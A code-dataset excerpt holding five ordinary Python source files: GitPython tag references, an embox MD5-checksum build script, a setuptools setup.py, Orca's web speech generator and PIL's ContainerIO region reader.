| repo_name (string, 5-100 chars) | ref (string, 12-67 chars) | path (string, 4-244 chars) | copies (string, 1-8 chars) | content (string, 0-1.05M chars, nullable) |
|---|---|---|---|---|
kenshay/ImageScripter
|
refs/heads/master
|
ProgramData/SystemFiles/Python/Lib/site-packages/git/refs/tag.py
|
4
|
from .reference import Reference
__all__ = ["TagReference", "Tag"]
class TagReference(Reference):
"""Class representing a lightweight tag reference which either points to a commit
,a tag object or any other object. In the latter case additional information,
like the signature or the tag-creator, is available.
This tag object will always point to a commit object, but may carry additional
information in a tag object::
tagref = TagReference.list_items(repo)[0]
print(tagref.commit.message)
if tagref.tag is not None:
print(tagref.tag.message)"""
__slots__ = tuple()
_common_path_default = "refs/tags"
@property
def commit(self):
""":return: Commit object the tag ref points to
:raise ValueError: if the tag points to a tree or blob"""
obj = self.object
while obj.type != 'commit':
if obj.type == "tag":
# a tag object carries its target in .object - tags may point to anything, so keep unwrapping
obj = obj.object
else:
raise ValueError(("Cannot resolve commit as tag %s points to a %s object - " +
"use the `.object` property instead to access it") % (self, obj.type))
return obj
@property
def tag(self):
"""
:return: Tag object this tag ref points to, or None in case
we are a lightweight tag"""
obj = self.object
if obj.type == "tag":
return obj
return None
# make object read-only
# It should be reasonably hard to adjust an existing tag
object = property(Reference._get_object)
@classmethod
def create(cls, repo, path, ref='HEAD', message=None, force=False, **kwargs):
"""Create a new tag reference.
:param path:
The name of the tag, e.g. 1.0 or releases/1.0.
The prefix refs/tags is implied
:param ref:
A reference to the object you want to tag. It can be a commit, tree or
blob.
:param message:
If not None, the message will be used in your tag object. This will also
create an additional tag object that allows you to obtain that information, e.g.::
tagref.tag.message
:param force:
If True, force creation of the tag even if a tag with that name already exists.
:param kwargs:
Additional keyword arguments to be passed to git-tag
:return: A new TagReference"""
args = (path, ref)
if message:
kwargs['m'] = message
if force:
kwargs['f'] = True
repo.git.tag(*args, **kwargs)
return TagReference(repo, "%s/%s" % (cls._common_path_default, path))
@classmethod
def delete(cls, repo, *tags):
"""Delete the given existing tag or tags"""
repo.git.tag("-d", *tags)
# provide an alias
Tag = TagReference
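# Usage sketch (illustrative, not part of the module): exercising the public
# API above with GitPython. The repository path and tag names are hypothetical.
#
# from git import Repo
# repo = Repo("/path/to/repo")
# light = TagReference.create(repo, "v1.0") # lightweight tag on HEAD
# annotated = TagReference.create(repo, "v1.1", message="release notes")
# print(light.tag) # None - lightweight tags carry no tag object
# print(annotated.tag.message) # "release notes"
# print(annotated.commit.hexsha) # resolved through the tag object
# TagReference.delete(repo, light, annotated)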
|
Kakadu/embox
|
refs/heads/clang-compilation
|
mk/gensums.py
|
4
|
#!/usr/bin/env python
import sys
import re
try:
# Python2
import md5
md5factory = md5.new
md5dig = lambda m: [ ord(x) for x in m.digest() ]
except ImportError:
# Python3
import hashlib
md5factory = hashlib.md5
md5dig = lambda m: list(m.digest())
def parse(file, sectname):
vmas = dict()
lens = dict()
target_d = { 'vma' : vmas, 'len' : lens }
for line in file.readlines():
m = re.search(r'([0-9a-f]+)\s[A-Z]\s__module_(.*)_%s_(vma|len)' % (sectname,), line)
if not m:
continue
target = target_d[m.group(3)]
k = m.group(2)
assert k not in target
target[k] = int(m.group(1), 16)
assert len(vmas) == len(lens)
return dict( (k, (vmas[k], lens[k])) for k in vmas )
def main(nmfile, sectname, sectfile, vma_offset):
stat = parse(nmfile, sectname)
with open(sectfile, 'rb') as f:
sectdata = f.read()
for mod, (start, dlen) in stat.items():
datastart = start - vma_offset
m = md5factory()
m.update(bytes(sectdata[datastart : datastart + dlen]))
print('const char __module_%s_%s_md5sum[16] = "%s";' %
(mod, sectname, ''.join([ '\\x{0:02x}'.format(x) for x in md5dig(m) ])))
if __name__ == '__main__':
main(sys.stdin, sys.argv[1], sys.argv[2], int(sys.argv[3], 0))
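# Usage sketch (assumed invocation; file names are illustrative). The script
# expects `nm` output on stdin containing paired symbols
# __module_<name>_<sectname>_vma and __module_<name>_<sectname>_len, e.g.:
#
# 00010000 A __module_foo_text_vma
# 00000200 A __module_foo_text_len
#
# and emits one md5sum C definition per module:
#
# nm embox.o | python gensums.py text text.bin 0x10000 > gensums.c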
|
theandygross/Figures
|
refs/heads/master
|
setup.py
|
1
|
#!/usr/bin/env python
from setuptools import setup
setup(name='PandasFigureWrappers',
version='0.1',
description='Wrappers for Scipy and R stats using Pandas objects.',
author='Andrew Gross',
author_email='the.andrew.gross@gmail.com',
url='http://andy-gross.flavors.me',
package_dir = {'': 'src'},
packages=['Figures'],
)
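# Usage note (standard setuptools workflow, nothing project-specific): from the
# directory containing this file, `pip install .` installs the package, and the
# package_dir mapping above means the code is looked up under src/Figures/.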
|
GNOME/orca
|
refs/heads/master
|
src/orca/scripts/web/speech_generator.py
|
1
|
# Orca
#
# Copyright 2005-2009 Sun Microsystems Inc.
# Copyright 2010-2011 Orca Team
# Copyright 2011-2015 Igalia, S.L.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2005-2009 Sun Microsystems Inc." \
"Copyright (c) 2010-2011 Orca Team" \
"Copyright (c) 2011-2015 Igalia, S.L."
__license__ = "LGPL"
import pyatspi
import urllib.parse
from orca import debug
from orca import messages
from orca import object_properties
from orca import orca_state
from orca import settings
from orca import settings_manager
from orca import speech_generator
_settingsManager = settings_manager.getManager()
class SpeechGenerator(speech_generator.SpeechGenerator):
def __init__(self, script):
super().__init__(script)
def _generateOldAncestors(self, obj, **args):
if args.get('index', 0) > 0:
return []
priorObj = args.get('priorObj')
if self._script.utilities.isInlineIframeDescendant(priorObj):
return []
return super()._generateOldAncestors(obj, **args)
def _generateNewAncestors(self, obj, **args):
if args.get('index', 0) > 0 \
and not self._script.utilities.isListDescendant(obj):
return []
if self._script.utilities.isInlineIframeDescendant(obj):
return []
return super()._generateNewAncestors(obj, **args)
def _generateAncestors(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateAncestors(obj, **args)
if self._script.inSayAll() and obj == orca_state.locusOfFocus:
return []
result = []
priorObj = args.get('priorObj')
if priorObj and self._script.utilities.inDocumentContent(priorObj):
priorDoc = self._script.utilities.getDocumentForObject(priorObj)
doc = self._script.utilities.getDocumentForObject(obj)
if priorDoc != doc and not self._script.utilities.getDocumentForObject(doc):
result = [super()._generateName(doc)]
if self._script.utilities.isLink(obj) \
or self._script.utilities.isLandmark(obj) \
or self._script.utilities.isMath(obj) \
or obj.getRole() in [pyatspi.ROLE_TOOL_TIP, pyatspi.ROLE_STATUS_BAR]:
return result
args['stopAtRoles'] = [pyatspi.ROLE_DOCUMENT_FRAME,
pyatspi.ROLE_DOCUMENT_WEB,
pyatspi.ROLE_EMBEDDED,
pyatspi.ROLE_INTERNAL_FRAME,
pyatspi.ROLE_MATH,
pyatspi.ROLE_MENU_BAR]
args['skipRoles'] = [pyatspi.ROLE_PARAGRAPH,
pyatspi.ROLE_HEADING,
pyatspi.ROLE_LABEL,
pyatspi.ROLE_LINK,
pyatspi.ROLE_LIST_ITEM,
pyatspi.ROLE_TEXT]
args['stopAfterRoles'] = [pyatspi.ROLE_TOOL_BAR]
if self._script.utilities.isEditableDescendantOfComboBox(obj):
args['skipRoles'].append(pyatspi.ROLE_COMBO_BOX)
result.extend(super()._generateAncestors(obj, **args))
return result
def _generateAllTextSelection(self, obj, **args):
if self._script.utilities.isZombie(obj) \
or obj != orca_state.locusOfFocus:
return []
# TODO - JD: These (and the default script's) need to
# call utility methods rather than generate it.
return super()._generateAllTextSelection(obj, **args)
def _generateAnyTextSelection(self, obj, **args):
if self._script.utilities.isZombie(obj) \
or obj != orca_state.locusOfFocus:
return []
# TODO - JD: These (and the default script's) need to
# call utility methods rather than generate it.
return super()._generateAnyTextSelection(obj, **args)
def _generateHasPopup(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return []
result = []
popupType = self._script.utilities.popupType(obj)
if popupType == 'dialog':
result = [messages.HAS_POPUP_DIALOG]
elif popupType == 'grid':
result = [messages.HAS_POPUP_GRID]
elif popupType == 'listbox':
result = [messages.HAS_POPUP_LISTBOX]
elif popupType in ('menu', 'true'):
result = [messages.HAS_POPUP_MENU]
elif popupType == 'tree':
result = [messages.HAS_POPUP_TREE]
if result:
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateClickable(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return []
if not args.get('mode', None):
args['mode'] = self._mode
args['stringType'] = 'clickable'
if self._script.utilities.isClickableElement(obj):
result = [self._script.formatting.getString(**args)]
result.extend(self.voice(speech_generator.SYSTEM))
return result
return []
def _generateDescription(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generateDescription(obj, **args)
if self._script.utilities.isZombie(obj):
return []
if self._script.utilities.preferDescriptionOverName(obj):
return []
role = args.get('role', obj.getRole())
if obj != orca_state.locusOfFocus:
if role in [pyatspi.ROLE_ALERT, pyatspi.ROLE_DIALOG]:
return super()._generateDescription(obj, **args)
if not args.get('inMouseReview'):
return []
formatType = args.get('formatType')
if formatType == 'basicWhereAmI' and self._script.utilities.isLiveRegion(obj):
return self._script.liveRegionManager.generateLiveRegionDescription(obj, **args)
if role == pyatspi.ROLE_TEXT and formatType != 'basicWhereAmI':
return []
# TODO - JD: This is private.
if role == pyatspi.ROLE_LINK and self._script._lastCommandWasCaretNav:
return []
return super()._generateDescription(obj, **args)
def _generateHasLongDesc(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return []
if not args.get('mode', None):
args['mode'] = self._mode
args['stringType'] = 'haslongdesc'
if self._script.utilities.hasLongDesc(obj):
result = [self._script.formatting.getString(**args)]
result.extend(self.voice(speech_generator.SYSTEM))
return result
return []
def _generateHasDetails(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generateHasDetails(obj, **args)
objs = self._script.utilities.detailsIn(obj)
if not objs:
return []
objString = lambda x: str.strip("%s %s" % (x.name, self.getLocalizedRoleName(x)))
toPresent = ", ".join(set(map(objString, objs)))
args['stringType'] = 'hasdetails'
result = [self._script.formatting.getString(**args) % toPresent]
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateAllDetails(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
objs = self._script.utilities.detailsIn(obj)
if not objs:
container = pyatspi.findAncestor(obj, self._script.utilities.hasDetails)
objs = self._script.utilities.detailsIn(container)
if not objs:
return []
args['stringType'] = 'hasdetails'
result = [self._script.formatting.getString(**args) % ""]
result.extend(self.voice(speech_generator.SYSTEM))
result = []
for o in objs:
result.append(self.getLocalizedRoleName(o))
result.extend(self.voice(speech_generator.SYSTEM))
string = self._script.utilities.expandEOCs(o)
if not string.strip():
continue
result.append(string)
result.extend(self.voice(speech_generator.DEFAULT))
result.extend(self._generatePause(o))
return result
def _generateDetailsFor(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generateDetailsFor(obj, **args)
objs = self._script.utilities.detailsFor(obj)
if not objs:
return []
if args.get('leaving'):
return []
lastKey, mods = self._script.utilities.lastKeyAndModifiers()
if (lastKey in ['Down', 'Right'] or self._script.inSayAll()) and args.get('startOffset'):
return []
if lastKey in ['Up', 'Left']:
text = self._script.utilities.queryNonEmptyText(obj)
if text and args.get('endOffset') not in [None, text.characterCount]:
return []
result = []
objArgs = {'stringType': 'detailsfor', 'mode': args.get('mode')}
for o in objs:
string = self._script.utilities.displayedText(o) or self.getLocalizedRoleName(o)
words = string.split()
if len(words) > 5:
words = words[0:5] + ['...']
result.append(self._script.formatting.getString(**objArgs) % " ".join(words))
result.extend(self.voice(speech_generator.SYSTEM))
result.extend(self._generatePause(o, **objArgs))
return result
def _generateLabelOrName(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateLabelOrName(obj, **args)
if self._script.utilities.isTextBlockElement(obj) \
and not self._script.utilities.isLandmark(obj) \
and not self._script.utilities.isDocument(obj) \
and not self._script.utilities.isDPub(obj) \
and not self._script.utilities.isContentSuggestion(obj):
return []
priorObj = args.get("priorObj")
if obj == priorObj:
return []
if priorObj and priorObj in self._script.utilities.labelsForObject(obj):
return []
if self._script.utilities.isContentEditableWithEmbeddedObjects(obj) \
or self._script.utilities.isDocument(obj):
lastKey, mods = self._script.utilities.lastKeyAndModifiers()
if lastKey in ["Home", "End", "Up", "Down", "Left", "Right", "Page_Up", "Page_Down"]:
return []
if priorObj and priorObj.getRole() == pyatspi.ROLE_PAGE_TAB and priorObj.name == obj.name:
return []
if obj.name:
name = obj.name
if not self._script.utilities.hasExplicitName(obj):
name = name.strip()
if self._script.utilities.shouldVerbalizeAllPunctuation(obj):
name = self._script.utilities.verbalizeAllPunctuation(name)
result = [name]
result.extend(self.voice(speech_generator.DEFAULT))
return result
if obj.getRole() == pyatspi.ROLE_CHECK_BOX:
gridCell = pyatspi.findAncestor(obj, self._script.utilities.isGridCell)
if gridCell:
return super()._generateLabelOrName(gridCell, **args)
return super()._generateLabelOrName(obj, **args)
def _generateName(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateName(obj, **args)
if self._script.utilities.isTextBlockElement(obj) \
and not self._script.utilities.isLandmark(obj) \
and not self._script.utilities.isDPub(obj) \
and not args.get('inFlatReview'):
return []
if self._script.utilities.hasVisibleCaption(obj):
return []
if self._script.utilities.isFigure(obj) and args.get('ancestorOf'):
caption = args.get('ancestorOf')
if caption.getRole() != pyatspi.ROLE_CAPTION:
isCaption = lambda x: x and x.getRole() == pyatspi.ROLE_CAPTION
caption = pyatspi.findAncestor(caption, isCaption)
if caption and hash(obj) in self._script.utilities.labelTargets(caption):
return []
role = args.get('role', obj.getRole())
# TODO - JD: Once the formatting strings are vastly cleaned up
# or simply removed, hacks like this won't be needed.
if role in [pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_SPIN_BUTTON]:
return super()._generateName(obj, **args)
if obj.name:
if self._script.utilities.preferDescriptionOverName(obj):
result = [obj.description]
elif self._script.utilities.isLink(obj) \
and not self._script.utilities.hasExplicitName(obj):
return []
else:
name = obj.name
if not self._script.utilities.hasExplicitName(obj):
name = name.strip()
result = [name]
result.extend(self.voice(speech_generator.DEFAULT))
return result
return super()._generateName(obj, **args)
def _generateLabel(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateLabel(obj, **args)
if self._script.utilities.isTextBlockElement(obj):
return []
label, objects = self._script.utilities.inferLabelFor(obj)
if label:
result = [label]
result.extend(self.voice(speech_generator.DEFAULT))
return result
return super()._generateLabel(obj, **args)
def _generateNewNodeLevel(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if self._script.utilities.isTextBlockElement(obj) \
or self._script.utilities.isLink(obj):
return []
return super()._generateNewNodeLevel(obj, **args)
def _generateLeaving(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not args.get('leaving'):
return []
if self._script.utilities.inDocumentContent(obj) \
and not self._script.utilities.inDocumentContent(orca_state.locusOfFocus):
result = ['']
result.extend(self.voice(speech_generator.SYSTEM))
return result
return super()._generateLeaving(obj, **args)
def _generateNewRadioButtonGroup(self, obj, **args):
# TODO - JD: Looking at the default speech generator's method, this
# is all kinds of broken. Until that can be sorted out, try to filter
# out some of the noise....
return []
def _generateNumberOfChildren(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText') \
or _settingsManager.getSetting('speechVerbosityLevel') == settings.VERBOSITY_LEVEL_BRIEF:
return []
# We handle things even for non-document content due to issues in
# other toolkits (e.g. exposing list items to us that are not
# exposed to sighted users)
role = args.get('role', obj.getRole())
if role not in [pyatspi.ROLE_LIST, pyatspi.ROLE_LIST_BOX]:
return super()._generateNumberOfChildren(obj, **args)
setsize = self._script.utilities.getSetSize(obj[0])
if setsize is None:
children = [x for x in obj if x.getRole() == pyatspi.ROLE_LIST_ITEM]
setsize = len(children)
if not setsize:
return []
result = [messages.listItemCount(setsize)]
result.extend(self.voice(speech_generator.SYSTEM))
return result
# TODO - JD: Yet another dumb generator method we should kill.
def _generateTextRole(self, obj, **args):
return self._generateRoleName(obj, **args)
def getLocalizedRoleName(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super().getLocalizedRoleName(obj, **args)
roledescription = self._script.utilities.getRoleDescription(obj)
if roledescription:
return roledescription
return super().getLocalizedRoleName(obj, **args)
def _generateRealActiveDescendantDisplayedText(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateRealActiveDescendantDisplayedText(obj, **args)
return self._generateDisplayedText(obj, **args)
def _generateRoleName(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generateRoleName(obj, **args)
if obj == args.get('priorObj'):
return []
result = []
acss = self.voice(speech_generator.SYSTEM)
roledescription = self._script.utilities.getRoleDescription(obj)
if roledescription:
result = [roledescription]
result.extend(acss)
return result
role = args.get('role', obj.getRole())
enabled, disabled = self._getEnabledAndDisabledContextRoles()
if role in disabled:
return []
force = args.get('force', False)
start = args.get('startOffset')
end = args.get('endOffset')
index = args.get('index', 0)
total = args.get('total', 1)
if not force:
doNotSpeak = [pyatspi.ROLE_FOOTER,
pyatspi.ROLE_FORM,
pyatspi.ROLE_LABEL,
pyatspi.ROLE_MENU_ITEM,
pyatspi.ROLE_PARAGRAPH,
pyatspi.ROLE_SECTION,
pyatspi.ROLE_REDUNDANT_OBJECT,
pyatspi.ROLE_UNKNOWN]
else:
doNotSpeak = [pyatspi.ROLE_UNKNOWN]
if not force:
doNotSpeak.append(pyatspi.ROLE_TABLE_CELL)
doNotSpeak.append(pyatspi.ROLE_TEXT)
doNotSpeak.append(pyatspi.ROLE_STATIC)
if args.get('string'):
doNotSpeak.append("ROLE_CONTENT_SUGGESTION")
if args.get('formatType', 'unfocused') != 'basicWhereAmI':
doNotSpeak.append(pyatspi.ROLE_LIST_ITEM)
doNotSpeak.append(pyatspi.ROLE_LIST)
if (start or end):
doNotSpeak.append(pyatspi.ROLE_DOCUMENT_FRAME)
doNotSpeak.append(pyatspi.ROLE_DOCUMENT_WEB)
doNotSpeak.append(pyatspi.ROLE_ALERT)
if self._script.utilities.isAnchor(obj):
doNotSpeak.append(obj.getRole())
if total > 1:
doNotSpeak.append(pyatspi.ROLE_ROW_HEADER)
if self._script.utilities.isMenuInCollapsedSelectElement(obj):
doNotSpeak.append(pyatspi.ROLE_MENU)
lastKey, mods = self._script.utilities.lastKeyAndModifiers()
isEditable = obj.getState().contains(pyatspi.STATE_EDITABLE)
if isEditable and not self._script.utilities.isContentEditableWithEmbeddedObjects(obj):
if ((lastKey in ["Down", "Right"] and not mods) or self._script.inSayAll()) and start:
return []
if lastKey in ["Up", "Left"] and not mods:
text = self._script.utilities.queryNonEmptyText(obj)
if text and end not in [None, text.characterCount]:
return []
if role not in doNotSpeak:
result.append(self.getLocalizedRoleName(obj, **args))
result.extend(acss)
elif isEditable and self._script.utilities.isDocument(obj):
if obj.parent and not obj.parent.getState().contains(pyatspi.STATE_EDITABLE) \
and lastKey not in ["Home", "End", "Up", "Down", "Left", "Right", "Page_Up", "Page_Down"]:
result.append(object_properties.ROLE_EDITABLE_CONTENT)
result.extend(acss)
elif role == pyatspi.ROLE_HEADING:
if index == total - 1 or not self._script.utilities.isFocusableWithMathChild(obj):
level = self._script.utilities.headingLevel(obj)
if level:
result.append(object_properties.ROLE_HEADING_LEVEL_SPEECH % {
'role': self.getLocalizedRoleName(obj, **args),
'level': level})
result.extend(acss)
else:
result.append(self.getLocalizedRoleName(obj, **args))
result.extend(acss)
elif self._script.utilities.isLink(obj):
if obj.parent.getRole() == pyatspi.ROLE_IMAGE:
result.append(messages.IMAGE_MAP_LINK)
result.extend(acss)
else:
if self._script.utilities.hasUselessCanvasDescendant(obj):
result.append(self.getLocalizedRoleName(obj, role=pyatspi.ROLE_IMAGE))
result.extend(acss)
if index == total - 1 or not self._script.utilities.isFocusableWithMathChild(obj):
result.append(self.getLocalizedRoleName(obj, **args))
result.extend(acss)
elif role not in doNotSpeak and args.get('priorObj') != obj:
result.append(self.getLocalizedRoleName(obj, **args))
result.extend(acss)
if self._script.utilities.isMath(obj) and not self._script.utilities.isMathTopLevel(obj):
return result
ancestorRoles = [pyatspi.ROLE_HEADING, pyatspi.ROLE_LINK]
speakRoles = lambda x: x and x.getRole() in ancestorRoles
ancestor = pyatspi.findAncestor(obj, speakRoles)
if ancestor and ancestor.getRole() != role and (index == total - 1 or obj.name == ancestor.name):
result.extend(self._generateRoleName(ancestor))
return result
def _generatePageSummary(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return []
onlyIfFound = args.get('formatType') != 'detailedWhereAmI'
string = self._script.utilities.getPageSummary(obj, onlyIfFound)
if not string:
return []
result = [string]
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateSiteDescription(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return []
link_uri = self._script.utilities.uri(obj)
if not link_uri:
return []
link_uri_info = urllib.parse.urlparse(link_uri)
doc_uri = self._script.utilities.documentFrameURI()
if not doc_uri:
return []
result = []
doc_uri_info = urllib.parse.urlparse(doc_uri)
if link_uri_info[1] == doc_uri_info[1]:
if link_uri_info[2] == doc_uri_info[2]:
result.append(messages.LINK_SAME_PAGE)
else:
result.append(messages.LINK_SAME_SITE)
else:
linkdomain = link_uri_info[1].split('.')
docdomain = doc_uri_info[1].split('.')
if len(linkdomain) > 1 and len(docdomain) > 1 \
and linkdomain[-1] == docdomain[-1] \
and linkdomain[-2] == docdomain[-2]:
result.append(messages.LINK_SAME_SITE)
else:
result.append(messages.LINK_DIFFERENT_SITE)
if result:
result.extend(self.voice(speech_generator.HYPERLINK))
return result
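# Illustrative aside (not Orca code): _generateSiteDescription() above compares
# urlparse() tuples - index 1 is the netloc, index 2 the path - and falls back
# to matching the last two domain labels:
#
# from urllib.parse import urlparse
# link = urlparse("http://docs.example.org/a")
# doc = urlparse("http://www.example.org/b")
# same_page = link[1] == doc[1] and link[2] == doc[2] # False
# same_site = link[1].split(".")[-2:] == doc[1].split(".")[-2:] # True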
def _generateExpandedEOCs(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateExpandedEOCs(obj, **args)
result = []
startOffset = args.get('startOffset', 0)
endOffset = args.get('endOffset', -1)
text = self._script.utilities.expandEOCs(obj, startOffset, endOffset)
if text:
result.append(text)
return result
def _generatePositionInList(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not args.get('forceList', False) \
and not _settingsManager.getSetting('enablePositionSpeaking'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generatePositionInList(obj, **args)
menuRoles = [pyatspi.ROLE_MENU_ITEM,
pyatspi.ROLE_TEAROFF_MENU_ITEM,
pyatspi.ROLE_CHECK_MENU_ITEM,
pyatspi.ROLE_RADIO_MENU_ITEM,
pyatspi.ROLE_MENU]
if obj.getRole() in menuRoles:
return super()._generatePositionInList(obj, **args)
if self._script.utilities.isEditableComboBox(obj):
return []
if args.get('formatType') not in ['basicWhereAmI', 'detailedWhereAmI']:
if args.get('priorObj') == obj:
return []
position = self._script.utilities.getPositionInSet(obj)
total = self._script.utilities.getSetSize(obj)
if position is None or total is None:
return super()._generatePositionInList(obj, **args)
position = int(position)
total = int(total)
if position < 0 or total < 0:
return []
result = []
result.append(self._script.formatting.getString(
mode='speech',
stringType='groupindex') \
% {"index" : position,
"total" : total})
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateUnselectedCell(self, obj, **args):
if not self._script.inFocusMode():
return []
return super()._generateUnselectedCell(obj, **args)
def _generateRealTableCell(self, obj, **args):
result = super()._generateRealTableCell(obj, **args)
if not self._script.inFocusMode():
return result
if _settingsManager.getSetting('speakCellCoordinates'):
label = self._script.utilities.labelForCellCoordinates(obj)
if label:
result.append(label)
result.extend(self.voice(speech_generator.SYSTEM))
return result
row, col = self._script.utilities.coordinatesForCell(obj)
if self._script.utilities.cellRowChanged(obj):
result.append(messages.TABLE_ROW % (row + 1))
result.extend(self.voice(speech_generator.SYSTEM))
if self._script.utilities.cellColumnChanged(obj):
result.append(messages.TABLE_COLUMN % (col + 1))
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateTableCellRow(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateTableCellRow(obj, **args)
if not self._script.utilities.shouldReadFullRow(obj):
return self._generateRealTableCell(obj, **args)
isRow = lambda x: x and x.getRole() == pyatspi.ROLE_TABLE_ROW
row = pyatspi.findAncestor(obj, isRow)
if row and row.name and not self._script.utilities.isLayoutOnly(row):
return self.generate(row)
return super()._generateTableCellRow(obj, **args)
def _generateRowHeader(self, obj, **args):
if self._script.utilities.lastInputEventWasLineNav():
return []
return super()._generateRowHeader(obj, **args)
def generateSpeech(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
msg = "WEB: %s is not in document content. Calling default speech generator." % obj
debug.println(debug.LEVEL_INFO, msg, True)
return super().generateSpeech(obj, **args)
msg = "WEB: Generating speech for document object %s" % obj
debug.println(debug.LEVEL_INFO, msg, True)
result = []
if args.get('formatType') == 'detailedWhereAmI':
oldRole = self._overrideRole('default', args)
elif self._script.utilities.isLink(obj):
oldRole = self._overrideRole(pyatspi.ROLE_LINK, args)
elif self._script.utilities.treatAsDiv(obj, offset=args.get('startOffset')):
oldRole = self._overrideRole(pyatspi.ROLE_SECTION, args)
else:
oldRole = self._overrideRole(self._getAlternativeRole(obj, **args), args)
if 'priorObj' not in args:
document = self._script.utilities.getTopLevelDocumentForObject(obj)
args['priorObj'] = self._script.utilities.getPriorContext(document)[0]
if not result:
result = list(filter(lambda x: x, super().generateSpeech(obj, **args)))
self._restoreRole(oldRole, args)
msg = "WEB: Speech generation for document object %s complete." % obj
debug.println(debug.LEVEL_INFO, msg, True)
return result
def generateContents(self, contents, **args):
if not contents:
return []
result = []
contents = self._script.utilities.filterContentsForPresentation(contents, True)
msg = "WEB: Generating speech contents (length: %i)" % len(contents)
debug.println(debug.LEVEL_INFO, msg, True)
for i, content in enumerate(contents):
obj, start, end, string = content
msg = "ITEM %i: %s, start: %i, end: %i, string: '%s'" \
% (i, obj, start, end, string)
debug.println(debug.LEVEL_INFO, msg, True)
utterance = self.generateSpeech(
obj, startOffset=start, endOffset=end, string=string,
index=i, total=len(contents), **args)
if isinstance(utterance, list):
isNotEmptyList = lambda x: not (isinstance(x, list) and not x)
utterance = list(filter(isNotEmptyList, utterance))
if utterance and utterance[0]:
result.append(utterance)
args['priorObj'] = obj
if not result:
if self._script.inSayAll(treatInterruptedAsIn=False) \
or not _settingsManager.getSetting('speakBlankLines'):
string = ""
else:
string = messages.BLANK
result = [string, self.voice(speech_generator.DEFAULT)]
return result
|
yasoob/PythonRSSReader
|
refs/heads/master
|
venv/lib/python2.7/dist-packages/PIL/ContainerIO.py
|
18
|
#
# The Python Imaging Library.
# $Id$
#
# a class to read from a container file
#
# History:
# 1995-06-18 fl Created
# 1995-09-07 fl Added readline(), readlines()
#
# Copyright (c) 1997-2001 by Secret Labs AB
# Copyright (c) 1995 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
##
# A file object that provides read access to a part of an existing
# file (for example a TAR file).
class ContainerIO:
##
# Create file object.
#
# @param file Existing file.
# @param offset Start of region, in bytes.
# @param length Size of region, in bytes.
def __init__(self, file, offset, length):
self.fh = file
self.pos = 0
self.offset = offset
self.length = length
self.fh.seek(offset)
##
# Always false.
def isatty(self):
return 0
##
# Move file pointer.
#
# @param offset Offset in bytes.
# @param mode Starting position. Use 0 for beginning of region, 1
# for current offset, and 2 for end of region. You cannot move
# the pointer outside the defined region.
def seek(self, offset, mode = 0):
if mode == 1:
self.pos = self.pos + offset
elif mode == 2:
self.pos = self.length + offset
else:
self.pos = offset
# clamp
self.pos = max(0, min(self.pos, self.length))
self.fh.seek(self.offset + self.pos)
##
# Get current file pointer.
#
# @return Offset from start of region, in bytes.
def tell(self):
return self.pos
##
# Read data.
#
# @def read(n=0)
# @param n Number of bytes to read. If omitted or zero,
# read until end of region.
# @return An 8-bit string.
def read(self, n = 0):
if n:
n = min(n, self.length - self.pos)
else:
n = self.length - self.pos
if not n: # EOF
return ""
self.pos = self.pos + n
return self.fh.read(n)
##
# Read a line of text.
#
# @return An 8-bit string.
def readline(self):
s = ""
while True:
c = self.read(1)
if not c:
break
s = s + c
if c == "\n":
break
return s
##
# Read multiple lines of text.
#
# @return A list of 8-bit strings.
def readlines(self):
l = []
while True:
s = self.readline()
if not s:
break
l.append(s)
return l
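# Usage sketch (illustrative; the file name is hypothetical): expose a byte
# region of a larger file as a file-like object.
#
# fh = open("archive.bin", "rb")
# region = ContainerIO(fh, offset=128, length=1024)
# region.seek(0) # offsets are relative to the region, not the file
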